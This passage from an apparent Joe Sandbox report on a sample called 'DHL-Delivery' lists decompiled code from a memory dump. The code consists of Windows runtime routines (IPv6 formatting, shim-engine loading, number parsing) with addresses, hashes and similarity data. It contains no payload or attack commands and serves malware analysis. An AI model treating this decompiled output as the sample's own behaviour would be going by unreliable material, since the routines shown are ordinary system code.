							_t109 = _t67;
							_v8 = _t111;
						}
					}
					_t122 = _t122 + 1;
				} while (_t122 < _v24);
				_v12 = _t109;
				_t110 = _a8;
				if(_t111 - _t109 <= 1) {
					_t111 = _t127;
					_t72 = _t127;
					_v8 = _t111;
					_v12 = _t72;
				} else {
					_t72 = _v12;
				}
				do {
					if(_t72 <= _t127) {
						if(_t127 >= _t111) {
							goto L11;
						}
						_push(L"::");
						_push(_v16 - _t110 >> 1);
						_push(_t110);
						_t78 = E1E12DED0();
						_t111 = _v8;
						_t128 = _t128 + 0xc;
						_t127 = _t111 - 1;
						goto L15;
					}
					L11:
					if(_t127 != 0 && _t127 != _t111) {
						_push(":");
						_push(_v16 - _t110 >> 1);
						_push(_t110);
						_t91 = E1E12DED0();
						_t128 = _t128 + 0xc;
						_t110 = _t110 + _t91 * 2;
					}
					_t78 = E1E12DED0(_t110, _v16 - _t110 >> 1, L"%x",  *(_t126 + _t127 * 2) & 0x0000ffff);
					_t111 = _v8;
					_t128 = _t128 + 0x10;
					L15:
					_t123 = _v24;
					_t110 = _t110 + _t78 * 2;
					_t72 = _v12;
					_t127 = _t127 + 1;
				} while (_t127 < _t123);
				if(_t123 < 8) {
					_push( *(_t126 + 0xf) & 0x000000ff);
					_push( *(_t126 + 0xe) & 0x000000ff);
					_push( *(_t126 + 0xd) & 0x000000ff);
					_t110 = _t110 + E1E12DED0(_t110, _v16 - _t110 >> 1, L":%u.%u.%u.%u",  *(_t126 + 0xc) & 0x000000ff) * 2;
				}
				return _t110;
			}




























                        0x1e11bf09
                        0x1e11bf0e
                        0x1e11bf11
                        0x1e11bf16
                        0x1e11bf1d
                        0x1e11bf23
                        0x1e156a03
                        0x00000000
                        0x1e156a1d
                        0x1e156a1d
                        0x1e156a23
                        0x1e156a26
                        0x1e156a2c
                        0x00000000
                        0x00000000
                        0x1e156a32
                        0x1e156a39
                        0x1e156ab0
                        0x1e156abb
                        0x00000000
                        0x1e156acb
                        0x1e156a8a
                        0x1e156a8f
                        0x1e156a93
                        0x1e156aa0
                        0x1e156aa8
                        0x00000000
                        0x1e156aa8
                        0x1e156abb
                        0x1e156a3b
                        0x1e156a42
                        0x1e156a59
                        0x1e156a5e
                        0x1e156a62
                        0x1e156a67
                        0x1e156a6e
                        0x1e156a72
                        0x1e156a7c
                        0x00000000
                        0x1e156a81
                        0x1e156a4c
                        0x00000000
                        0x00000000
                        0x1e156a52
                        0x00000000
                        0x1e156a52
                        0x1e156a03
                        0x1e11bf29
                        0x1e11bf2e
                        0x1e11bf30
                        0x1e11bf32
                        0x1e11bf35
                        0x1e11bf3c
                        0x1e156acd
                        0x1e156acd
                        0x1e11bf4d
                        0x1e11bf4f
                        0x1e11bf51
                        0x1e11bf55
                        0x1e11c000
                        0x1e11c000
                        0x1e11c003
                        0x1e11bf5b
                        0x1e11bf65
                        0x1e11bf67
                        0x1e11bf6a
                        0x1e156ad9
                        0x1e11bf70
                        0x1e11bf70
                        0x1e11bf70
                        0x1e11bf73
                        0x1e11bf75
                        0x1e11bf75
                        0x1e11bf6a
                        0x1e11bf78
                        0x1e11bf79
                        0x1e11bf80
                        0x1e11bf85
                        0x1e11bf8b
                        0x1e156ae1
                        0x1e156ae3
                        0x1e156ae5
                        0x1e156ae8
                        0x1e11bf91
                        0x1e11bf91
                        0x1e11bf91
                        0x1e11bf94
                        0x1e11bf96
                        0x1e11c00d
                        0x00000000
                        0x00000000
                        0x1e11c014
                        0x1e11c01b
                        0x1e11c01c
                        0x1e11c01d
                        0x1e11c022
                        0x1e11c025
                        0x1e11c028
                        0x00000000
                        0x1e11c028
                        0x1e11bf98
                        0x1e11bf9a
                        0x1e11bfa5
                        0x1e11bfac
                        0x1e11bfad
                        0x1e11bfae
                        0x1e11bfb3
                        0x1e11bfb6
                        0x1e11bfb6
                        0x1e11bfd3
                        0x1e11bfd8
                        0x1e11bfdb
                        0x1e11bfde
                        0x1e11bfde
                        0x1e11bfe1
                        0x1e11bfe4
                        0x1e11bfe7
                        0x1e11bfe8
                        0x1e11bfef
                        0x1e156af4
                        0x1e156af9
                        0x1e156afe
                        0x1e156b1a
                        0x1e156b1a
                        0x00000000

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                        • API String ID: 48624451-2108815105
                        • Opcode ID: c11f71adec052349c277d226eb65e98254e806c16055c58cb3b866cf88d88c43
                        • Instruction ID: 4cebbf40064434f4f046d0166cc6c3415adcdc9c638b131700615c20f85ad953
                        • Opcode Fuzzy Hash: c11f71adec052349c277d226eb65e98254e806c16055c58cb3b866cf88d88c43
                        • Instruction Fuzzy Hash: BA61C475A00197EBCB10DF6DDD908BEB7B9BB04200B608775E465DB241D734EE948BE0
                        Uniqueness

                        Uniqueness Score: 0.10%

                        Function 1E1B6ECE, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275timeUNIQUE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: HEAP:
                        • API String ID: 3446177414-2466845122
                        • Opcode ID: c19c78ea2f387741f48cf76d12ba98a2244118fcedc9fb508d0b171fd7764a65
                        • Instruction ID: b8a89176c5e2c1f0c0e6bd85f0d7555122eb3954c674086b32c32151cca472ea
                        • Opcode Fuzzy Hash: c19c78ea2f387741f48cf76d12ba98a2244118fcedc9fb508d0b171fd7764a65
                        • Instruction Fuzzy Hash: 25A17C75A043128FD714CE28C8A0A5AB7F6BF88350F194B2EE941DB350EB70ED85CB91
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 1E0DBE3E, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 185timeUNIQUE
                        Download Yara Rule
                        C-Code - Quality: 62%
                        			E1E0DBE3E(intOrPtr* __ecx) {
				signed int _v8;
				char _v16;
				char _v92;
				char _v93;
				char _v100;
				signed short _v106;
				char _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t56;
				signed char _t67;
				intOrPtr _t76;
				signed char _t81;
				signed int _t86;
				signed int _t87;
				char _t88;
				intOrPtr _t103;
				signed int _t106;
				intOrPtr* _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t113;
				signed int _t114;
				intOrPtr* _t116;
				signed int _t117;
				void* _t118;

				_v8 =  *0x1e1d6360 ^ _t117;
				_v93 = 1;
				_t110 = __ecx;
				E1E0FA838(0, 0x4001,  &_v92);
				_t106 =  *0x7ffe0330;
				_t86 =  *0x1e1d4200; // 0x0
				_t113 = 0x20;
				 *0x1e1d14b8 = 1;
				_t92 = _t113 - (_t106 & 0x0000001f);
				asm("ror ebx, cl");
				_t87 = _t86 ^ _t106;
				_t120 =  *__ecx;
				if( *__ecx == 0) {
					L8:
					_t88 = _v93;
					L9:
					if(_v16 != 0) {
						E1E0E1EE0(_t92, _v92);
					}
					_t114 =  *0x1e1d4210; // 0x0
					asm("ror esi, cl");
					 *0x1e1d41e0();
					 *(_t114 ^  *0x7ffe0330)();
					_t108 =  *0x7ffe0330;
					_t111 =  *0x1e1d4218; // 0x0
					_push(0x20);
					asm("ror edi, cl");
					_t112 = _t111 ^  *0x7ffe0330;
					E1E0FFDF0(0x1e1ce2d8);
					_t98 = 0x1e1d0c4c;
					if( *0x1e1d14b0 != 0) {
						_t56 =  *0x1e1d0c4c; // 0x752c20
						while(1) {
							__eflags = _t56 - _t98;
							if(_t56 == _t98) {
								break;
							}
							_v100 = _t56;
							_t39 = _t56 + 0x35;
							 *_t39 =  *(_t56 + 0x35) & 0x000000f7;
							__eflags =  *_t39;
							_t56 =  *_t56;
						}
						goto L11;
					} else {
						L11:
						_t116 =  *0x1e1d0c4c; // 0x752c20
						if( *0x1e1d14b4 < 2) {
							_t116 =  *_t116;
						}
						if(_t116 == _t98) {
							L15:
							 *0x1e1d14b0 = 1;
							 *0x1e1d14b8 = 0;
							E1E0FFFF0(_t98, 0x1e1ce2d8);
							E1E0DC04C(_t98);
							return E1E1225C0(_t88, _t88, _v8 ^ _t117, _t108, _t112, _t116);
						} else {
							do {
								_v100 = _t116;
								_t108 = _t112;
								_t24 = _t116 + 0x50; // 0x752be8
								_t98 =  *_t24;
								E1E0DBFDF( *_t24, _t112);
								_t116 =  *_t116;
							} while (_t116 != 0x1e1d0c4c);
							goto L15;
						}
					}
				} else {
					goto L1;
				}
				do {
					L1:
					E1E122AC0(_t92,  &_v108, _t110);
					_t92 = E1E0FAE6D( &_v108,  &_v92, _t120, 1,  &_v100);
					if(_t92 < 0) {
						_t67 =  *0x1e1ce7b0; // 0x0
						__eflags = _t67 & 0x00000003;
						if((_t67 & 0x00000003) != 0) {
							_push(_t92);
							E1E15BDA0("minkernel\\ntdll\\ldrinit.c", 0x8cc, "LdrpLoadShimEngine", 0, "Loading the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t67 =  *0x1e1ce7b0; // 0x0
							_t118 = _t118 + 0x1c;
						}
						__eflags = _t67 & 0x00000010;
						if((_t67 & 0x00000010) != 0) {
							asm("int3");
						}
						_v93 = 0;
						goto L6;
					}
					 *(_v100 + 0x34) =  *(_v100 + 0x34) | 0x00000100;
					E1E10DCFF(_v100);
					_t76 = _v100;
					_t103 =  *((intOrPtr*)(_t76 + 0x50));
					_t122 =  *((intOrPtr*)(_t103 + 0x20)) - 7;
					if( *((intOrPtr*)(_t103 + 0x20)) != 7) {
						L5:
						 *0x1e1d41e0( *((intOrPtr*)(_t76 + 0x18)));
						 *_t87();
						_t92 = _v100;
						E1E0FB42D(_t87, _v100, _t113);
						goto L6;
					}
					_t113 = E1E0FA523(_t87, _t103, _t110, _t113, _t122);
					if(_t113 < 0) {
						_t81 =  *0x1e1ce7b0; // 0x0
						_t88 = 0;
						__eflags = _t81 & 0x00000003;
						if((_t81 & 0x00000003) != 0) {
							_push(_t113);
							E1E15BDA0("minkernel\\ntdll\\ldrinit.c", 0x8e6, "LdrpLoadShimEngine", 0, "Initializing the shim DLL \"%wZ\" failed with status 0x%08lx\n",  &_v108);
							_t81 =  *0x1e1ce7b0; // 0x0
						}
						__eflags = _t81 & 0x00000010;
						if((_t81 & 0x00000010) != 0) {
							asm("int3");
						}
						_t92 = _t113;
						E1E15F328(_t113);
						_push(_t113);
						_push(0xffffffff);
						E1E120760();
						_t113 = 0x20;
						goto L9;
					}
					_t76 = _v100;
					goto L5;
					L6:
					_t110 = _t110 + ((_v106 & 0x0000ffff) >> 1) * 2;
				} while ( *_t110 != 0);
				_t113 = 0x20;
				goto L8;
			}































                        0x1e0dbe4d
                        0x1e0dbe56
                        0x1e0dbe5a
                        0x1e0dbe64
                        0x1e0dbe69
                        0x1e0dbe71
                        0x1e0dbe7c
                        0x1e0dbe7f
                        0x1e0dbe86
                        0x1e0dbe8a
                        0x1e0dbe8c
                        0x1e0dbe8e
                        0x1e0dbe91
                        0x1e0dbf10
                        0x1e0dbf10
                        0x1e0dbf13
                        0x1e0dbf17
                        0x1e0dbfd5
                        0x1e0dbfd5
                        0x1e0dbf25
                        0x1e0dbf32
                        0x1e0dbf38
                        0x1e0dbf3e
                        0x1e0dbf40
                        0x1e0dbf48
                        0x1e0dbf51
                        0x1e0dbf56
                        0x1e0dbf5d
                        0x1e0dbf5f
                        0x1e0dbf6b
                        0x1e0dbf70
                        0x1e14d231
                        0x1e14d241
                        0x1e14d241
                        0x1e14d243
                        0x00000000
                        0x00000000
                        0x1e14d238
                        0x1e14d23b
                        0x1e14d23b
                        0x1e14d23b
                        0x1e14d23f
                        0x1e14d23f
                        0x00000000
                        0x1e0dbf76
                        0x1e0dbf76
                        0x1e0dbf7d
                        0x1e0dbf83
                        0x1e0dbf85
                        0x1e0dbf85
                        0x1e0dbf89
                        0x1e0dbfa2
                        0x1e0dbfa4
                        0x1e0dbfb0
                        0x1e0dbfb5
                        0x1e0dbfba
                        0x1e0dbfd1
                        0x1e0dbf8b
                        0x1e0dbf8b
                        0x1e0dbf8b
                        0x1e0dbf8e
                        0x1e0dbf90
                        0x1e0dbf90
                        0x1e0dbf93
                        0x1e0dbf98
                        0x1e0dbf9a
                        0x00000000
                        0x1e0dbf8b
                        0x1e0dbf89
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e0dbe93
                        0x1e0dbe93
                        0x1e0dbe98
                        0x1e0dbeae
                        0x1e0dbeb2
                        0x1e14d1a3
                        0x1e14d1a8
                        0x1e14d1aa
                        0x1e14d1ac
                        0x1e14d1c7
                        0x1e14d1cc
                        0x1e14d1d1
                        0x1e14d1d1
                        0x1e14d1d4
                        0x1e14d1d6
                        0x1e14d1d8
                        0x1e14d1d8
                        0x1e14d1db
                        0x00000000
                        0x1e14d1db
                        0x1e0dbebb
                        0x1e0dbec5
                        0x1e0dbeca
                        0x1e0dbecd
                        0x1e0dbed0
                        0x1e0dbed4
                        0x1e0dbee8
                        0x1e0dbeed
                        0x1e0dbef3
                        0x1e0dbef5
                        0x1e0dbef8
                        0x00000000
                        0x1e0dbef8
                        0x1e0dbedb
                        0x1e0dbedf
                        0x1e14d1e3
                        0x1e14d1e8
                        0x1e14d1ea
                        0x1e14d1ec
                        0x1e14d1ee
                        0x1e14d208
                        0x1e14d20d
                        0x1e14d212
                        0x1e14d215
                        0x1e14d217
                        0x1e14d219
                        0x1e14d219
                        0x1e14d21a
                        0x1e14d21c
                        0x1e14d221
                        0x1e14d222
                        0x1e14d224
                        0x1e14d22b
                        0x00000000
                        0x1e14d22b
                        0x1e0dbee5
                        0x00000000
                        0x1e0dbefd
                        0x1e0dbf03
                        0x1e0dbf08
                        0x1e0dbf0f
                        0x00000000

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: DebugPrintTimes
                        • String ID: ,u$Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                        • API String ID: 3446177414-2149402871
                        • Opcode ID: ef405ebbde3b6590314dc9902f5050bc7455fc927a10c527a5282a310aaa575b
                        • Instruction ID: 497637c9c758218a549647d1911ed9ce2f36ba5ed77eb67ee8b8e3c1ad7c6c23
                        • Opcode Fuzzy Hash: ef405ebbde3b6590314dc9902f5050bc7455fc927a10c527a5282a310aaa575b
                        • Instruction Fuzzy Hash: 51511635B103A49BCB04DBA8CC98BDD77B6BF45304F514769E946BB389CB64AC84CB90
                        Uniqueness

                        Uniqueness Score: 100.00%

                        Function 1E128EBE, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238UNIQUE
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E1E128EBE(intOrPtr __edx, intOrPtr* _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t82;
				signed int _t86;
				signed int _t89;
				intOrPtr _t91;
				void* _t93;
				void* _t94;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				void* _t100;
				signed char _t101;
				void* _t102;
				signed char _t103;
				void* _t104;
				signed char _t105;
				signed char _t107;
				signed int _t108;
				signed int _t111;
				intOrPtr* _t112;
				signed int _t113;
				intOrPtr _t114;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				signed int _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t127;
				signed int _t128;
				void* _t130;
				signed int _t131;
				intOrPtr _t132;
				void* _t134;

				_t122 = __edx;
				_t82 = _a12;
				_t112 = _a8;
				if(_t82 != 0) {
					 *_t82 = _t112;
				}
				if(_t112 == 0) {
					L76:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E1E122517(_t104, _t112, _t122, _t130, _t134);
					__eflags = 0;
					return 0;
				}
				_t86 = _a16;
				if(_t86 == 0 || _t86 >= 2 && _t86 <= 0x24) {
					_push(_t104);
					_t105 =  *_t112;
					_push(_t134);
					_push(_t130);
					_v12 = 0;
					_t131 = _t112 + 1;
					_v16 = 0;
					while(( *(E1E128EB8() + (_t105 & 0x000000ff) * 2) & 0x00000008) != 0) {
						do {
							_t103 =  *_t131;
							_t131 = _t131 + 1;
						} while (_t103 == _t105);
						_t105 = _t103;
					}
					_t89 = _a20;
					_v5 = _t105;
					__eflags = _t105 - 0x2d;
					if(_t105 != 0x2d) {
						__eflags = _t105 - 0x2b;
						if(_t105 != 0x2b) {
							L14:
							_t113 = _a16;
							_v20 = _t89;
							__eflags = _t113;
							if(_t113 != 0) {
								L22:
								__eflags = _t113 - 0x10;
								if(_t113 != 0x10) {
									L27:
									asm("cdq");
									_push(_t105);
									_t114 = _t122;
									_v52 = _t113;
									_v48 = _t114;
									_t91 = E1E1241A0(0xffffffff, 0xffffffff, _t113, _t114);
									_v40 = _t105;
									_t107 = _v5;
									__eflags = 0;
									_v44 = _t114;
									_v28 = _t91;
									_v32 = _t122;
									while(1) {
										_v24 = _t107 & 0x000000ff;
										_t93 = E1E128EB8();
										_t115 = _v24;
										__eflags =  *(_t93 + _t115 * 2) & 0x00000004;
										if(( *(_t93 + _t115 * 2) & 0x00000004) == 0) {
											goto L30;
										}
										_t128 = _t107 - 0x30;
										L34:
										_t108 = _v20;
										_t95 = _v16;
										_v24 = _t128;
										__eflags = _t128 - _a16;
										if(_t128 >= _a16) {
											L49:
											_t117 = _a12;
											L50:
											_t132 = _t131 - 1;
											__eflags = _t108 & 0x00000008;
											if((_t108 & 0x00000008) != 0) {
												__eflags = _t108 & 0x00000004;
												if((_t108 & 0x00000004) != 0) {
													L64:
													_t96 = E1E16ABF0();
													 *_t96 = 0x22;
													__eflags = _t108 & 0x00000001;
													if((_t108 & 0x00000001) == 0) {
														__eflags = _t108 & 0x00000002;
														if((_t108 & 0x00000002) == 0) {
															_t97 = _t96 | 0xffffffff;
															_t118 = 0x7fffffff;
														} else {
															_t97 = 0;
															_t118 = 0x80000000;
														}
													} else {
														_t97 = _t96 | 0xffffffff;
														_t118 = _t117 | 0xffffffff;
													}
													L71:
													_t125 = _a12;
													__eflags = _t125;
													if(_t125 != 0) {
														 *_t125 = _t132;
													}
													__eflags = _t108 & 0x00000002;
													if((_t108 & 0x00000002) != 0) {
														_t97 =  ~_t97;
														asm("adc ecx, esi");
														_t118 =  ~_t118;
													}
													return _t97;
												}
												__eflags = _t108 & 0x00000001;
												if((_t108 & 0x00000001) != 0) {
													L69:
													_t97 = _v12;
													L70:
													_t118 = _v16;
													goto L71;
												}
												__eflags = _t108 & 0x00000002;
												if((_t108 & 0x00000002) == 0) {
													__eflags = _t95 - 0x7fffffff;
													if(__eflags < 0) {
														goto L69;
													}
													if(__eflags > 0) {
														goto L64;
													}
													_t97 = _v12;
													__eflags = _t97 - 0xffffffff;
													if(_t97 <= 0xffffffff) {
														goto L70;
													}
													goto L64;
												}
												__eflags = _t95 - 0x80000000;
												if(__eflags > 0) {
													goto L64;
												}
												_t97 = _v12;
												if(__eflags < 0) {
													goto L70;
												}
												__eflags = _t97;
												if(_t97 > 0) {
													goto L64;
												}
												goto L70;
											}
											__eflags = _t117;
											if(_t117 != 0) {
												_t132 = _a8;
											}
											_t97 = 0;
											_t118 = 0;
											goto L71;
										}
										_t119 = _v12;
										_t111 = _t108 | 0x00000008;
										_v20 = _t111;
										__eflags = _t95 - _v32;
										if(__eflags < 0) {
											L45:
											_v24 = _t128;
											_v36 = 0;
											L46:
											_t121 = E1E123F10(_v52, _v48, _t119, _t95) + _v24;
											__eflags = _t121;
											_v12 = _t121;
											asm("adc eax, [ebp-0x20]");
											_v16 = _t128;
											L47:
											_t107 =  *_t131;
											_t131 = _t131 + 1;
											continue;
										}
										if(__eflags > 0) {
											L38:
											__eflags = _t119 - _v28;
											if(_t119 != _v28) {
												L43:
												_t117 = _a12;
												_t108 = _t111 | 0x00000004;
												_v20 = _t108;
												__eflags = _t117;
												if(_t117 == 0) {
													goto L50;
												}
												goto L47;
											}
											__eflags = _t95 - _v32;
											if(_t95 != _v32) {
												goto L43;
											}
											_v36 = 0;
											__eflags = 0 - _v40;
											if(__eflags < 0) {
												goto L46;
											}
											if(__eflags > 0) {
												goto L43;
											}
											__eflags = _t128 - _v44;
											if(_t128 <= _v44) {
												goto L46;
											}
											goto L43;
										}
										__eflags = _t119 - _v28;
										if(_t119 < _v28) {
											goto L45;
										}
										goto L38;
										L30:
										_t94 = E1E128EB8();
										_t116 = _v24;
										__eflags =  *(_t94 + _t116 * 2) & 0x00000103;
										if(( *(_t94 + _t116 * 2) & 0x00000103) == 0) {
											_t95 = _v16;
											_t108 = _v20;
											goto L49;
										}
										_t127 = _t107;
										__eflags = _t107 - 0x61 - 0x19;
										if(_t107 - 0x61 <= 0x19) {
											_t127 = _t127 + 0xffffffe0;
											__eflags = _t127;
										}
										_t128 = _t127 + 0xffffffc9;
										__eflags = _t128;
										goto L34;
									}
								}
								__eflags = _t105 - 0x30;
								if(_t105 != 0x30) {
									goto L27;
								}
								_t100 =  *_t131;
								__eflags = _t100 - 0x78;
								if(_t100 == 0x78) {
									L26:
									_t101 =  *(_t131 + 1);
									_t131 = _t131 + 2;
									__eflags = _t131;
									_v5 = _t101;
									goto L27;
								}
								__eflags = _t100 - 0x58;
								if(_t100 != 0x58) {
									goto L27;
								}
								goto L26;
							}
							__eflags = _t105 - 0x30;
							if(_t105 == 0x30) {
								_t102 =  *_t131;
								__eflags = _t102 - 0x78;
								if(_t102 == 0x78) {
									L21:
									_t113 = 0x10;
									_a16 = _t113;
									goto L22;
								}
								__eflags = _t102 - 0x58;
								if(_t102 == 0x58) {
									goto L21;
								}
								_push(8);
								L17:
								_pop(_t113);
								_a16 = _t113;
								goto L27;
							}
							_push(0xa);
							goto L17;
						}
						L13:
						_t105 =  *_t131;
						_t131 = _t131 + 1;
						__eflags = _t131;
						_v5 = _t105;
						goto L14;
					}
					_t89 = _t89 | 0x00000002;
					goto L13;
				} else {
					goto L76;
				}
			}





















































                        0x1e128ebe
                        0x1e128ec3
                        0x1e128ec9
                        0x1e128ece
                        0x1e128ed0
                        0x1e128ed0
                        0x1e128ed4
                        0x1e129102
                        0x1e129104
                        0x1e129105
                        0x1e129106
                        0x1e129107
                        0x1e129108
                        0x1e129109
                        0x1e129113
                        0x00000000
                        0x1e129113
                        0x1e128eda
                        0x1e128edf
                        0x1e128ef3
                        0x1e128ef4
                        0x1e128ef8
                        0x1e128ef9
                        0x1e128efa
                        0x1e128efd
                        0x1e128f00
                        0x1e128f03
                        0x1e128f11
                        0x1e128f11
                        0x1e128f13
                        0x1e128f14
                        0x1e128f18
                        0x1e128f18
                        0x1e128f1c
                        0x1e128f1f
                        0x1e128f22
                        0x1e128f25
                        0x1e128f2c
                        0x1e128f2f
                        0x1e128f37
                        0x1e128f37
                        0x1e128f3a
                        0x1e128f3d
                        0x1e128f3f
                        0x1e128f62
                        0x1e128f62
                        0x1e128f65
                        0x1e128f7f
                        0x1e128f81
                        0x1e128f82
                        0x1e128f83
                        0x1e128f85
                        0x1e128f8e
                        0x1e128f91
                        0x1e128f96
                        0x1e128f9b
                        0x1e128f9e
                        0x1e128fa0
                        0x1e128fa3
                        0x1e128fa6
                        0x1e128fa9
                        0x1e128fac
                        0x1e128faf
                        0x1e128fb4
                        0x1e128fb7
                        0x1e128fbb
                        0x00000000
                        0x00000000
                        0x1e128fc0
                        0x1e128fed
                        0x1e128fed
                        0x1e128ff0
                        0x1e128ff3
                        0x1e128ff6
                        0x1e128ff9
                        0x1e129069
                        0x1e129069
                        0x1e12906c
                        0x1e12906c
                        0x1e12906d
                        0x1e129070
                        0x1e12907f
                        0x1e129082
                        0x1e1290b1
                        0x1e1290b1
                        0x1e1290b6
                        0x1e1290bc
                        0x1e1290bf
                        0x1e1290c9
                        0x1e1290cc
                        0x1e1290d7
                        0x1e1290da
                        0x1e1290ce
                        0x1e1290ce
                        0x1e1290d0
                        0x1e1290d0
                        0x1e1290c1
                        0x1e1290c1
                        0x1e1290c4
                        0x1e1290c4
                        0x1e1290e7
                        0x1e1290e7
                        0x1e1290ea
                        0x1e1290ec
                        0x1e1290ee
                        0x1e1290ee
                        0x1e1290f0
                        0x1e1290f3
                        0x1e1290f5
                        0x1e1290f7
                        0x1e1290f9
                        0x1e1290f9
                        0x00000000
                        0x1e1290ff
                        0x1e129084
                        0x1e129087
                        0x1e1290e1
                        0x1e1290e1
                        0x1e1290e4
                        0x1e1290e4
                        0x00000000
                        0x1e1290e4
                        0x1e129089
                        0x1e12908c
                        0x1e1290a0
                        0x1e1290a5
                        0x00000000
                        0x00000000
                        0x1e1290a7
                        0x00000000
                        0x00000000
                        0x1e1290a9
                        0x1e1290ac
                        0x1e1290af
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e1290af
                        0x1e12908e
                        0x1e129093
                        0x00000000
                        0x00000000
                        0x1e129095
                        0x1e129098
                        0x00000000
                        0x00000000
                        0x1e12909a
                        0x1e12909c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e12909e
                        0x1e129072
                        0x1e129074
                        0x1e129076
                        0x1e129076
                        0x1e129079
                        0x1e12907b
                        0x00000000
                        0x1e12907b
                        0x1e128ffb
                        0x1e128ffe
                        0x1e129001
                        0x1e129004
                        0x1e129007
                        0x1e129038
                        0x1e129038
                        0x1e12903b
                        0x1e12903e
                        0x1e12904f
                        0x1e12904f
                        0x1e129052
                        0x1e129055
                        0x1e129058
                        0x1e12905b
                        0x1e12905b
                        0x1e12905d
                        0x00000000
                        0x1e12905d
                        0x1e129009
                        0x1e129010
                        0x1e129010
                        0x1e129013
                        0x1e129029
                        0x1e129029
                        0x1e12902c
                        0x1e12902f
                        0x1e129032
                        0x1e129034
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e129036
                        0x1e129015
                        0x1e129018
                        0x00000000
                        0x00000000
                        0x1e12901a
                        0x1e12901d
                        0x1e129020
                        0x00000000
                        0x00000000
                        0x1e129022
                        0x00000000
                        0x00000000
                        0x1e129024
                        0x1e129027
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e129027
                        0x1e12900b
                        0x1e12900e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e128fc5
                        0x1e128fc5
                        0x1e128fca
                        0x1e128fd2
                        0x1e128fd6
                        0x1e129063
                        0x1e129066
                        0x00000000
                        0x1e129066
                        0x1e128fdc
                        0x1e128fe2
                        0x1e128fe5
                        0x1e128fe7
                        0x1e128fe7
                        0x1e128fe7
                        0x1e128fea
                        0x1e128fea
                        0x00000000
                        0x1e128fea
                        0x1e128fa9
                        0x1e128f67
                        0x1e128f6a
                        0x00000000
                        0x00000000
                        0x1e128f6c
                        0x1e128f6e
                        0x1e128f70
                        0x1e128f76
                        0x1e128f76
                        0x1e128f79
                        0x1e128f79
                        0x1e128f7c
                        0x00000000
                        0x1e128f7c
                        0x1e128f72
                        0x1e128f74
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1e128f74
                        0x1e128f41
                        0x1e128f44
                        0x1e128f4e
                        0x1e128f50
                        0x1e128f52
                        0x1e128f5c
                        0x1e128f5e
                        0x1e128f5f
                        0x00000000
                        0x1e128f5f
                        0x1e128f54
                        0x1e128f56
                        0x00000000
                        0x00000000
                        0x1e128f58
                        0x1e128f48
                        0x1e128f48
                        0x1e128f49
                        0x00000000
                        0x1e128f49
                        0x1e128f46
                        0x00000000
                        0x1e128f46
                        0x1e128f31
                        0x1e128f31
                        0x1e128f33
                        0x1e128f33
                        0x1e128f34
                        0x00000000
                        0x1e128f34
                        0x1e128f27
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.2193221931.000000001E0B0000.00000040.00000001.sdmp, Offset: 1E0B0000, based on PE: true
                        • Associated: 00000006.00000002.2194193350.000000001E1D4000.00000040.00000001.sdmp Download File
                        • Associated: 00000006.00000002.2194242833.000000001E1D8000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_1e0b0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: __aulldvrm
                        • String ID: +$-$0$0
                        • API String ID: 1302938615-699404926
